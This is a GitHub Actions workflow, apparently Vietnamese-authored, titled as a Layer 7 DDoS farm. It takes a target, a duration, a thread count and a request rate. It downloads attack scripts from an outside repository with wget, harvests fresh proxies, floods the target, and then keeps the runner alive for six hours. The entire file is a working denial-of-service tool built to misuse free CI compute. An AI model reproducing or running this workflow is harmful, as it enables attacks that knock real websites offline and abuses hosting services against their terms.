name: DDoS Farm Layer7 + Auto Fresh Proxy

on:
  workflow_dispatch:
    inputs:
      method:
        default: '2'
        type: choice
        options: ['1','2','3','4']
      target:
        required: true
      time:
        default: '1800'
      threads:
        default: '128'
      rate:
        default: '256'

jobs:
  attack:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/setup-node@v4
        with: { node-version: 20 }
      - uses: actions/setup-python@v5
        with: { python-version: '3.11' }

      - name: Download tools
        run: |
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/cf.js
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/captcha.js
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/uam.js
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/run.py
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/proxy.js
          chmod +x *

      - name: Lấy proxy tươi
        run: |
          node proxy.js

      - name: Bắn Layer7 (CHẠY THẲNG KHÔNG HỎI)
        run: |
          python3 run.py 2 1 ${{ inputs.method }} ${{ inputs.target }} ${{ inputs.time }} ${{ inputs.threads }} ${{ inputs.rate }} proxy.txt

      - name: Keep alive
        run: sleep 21600
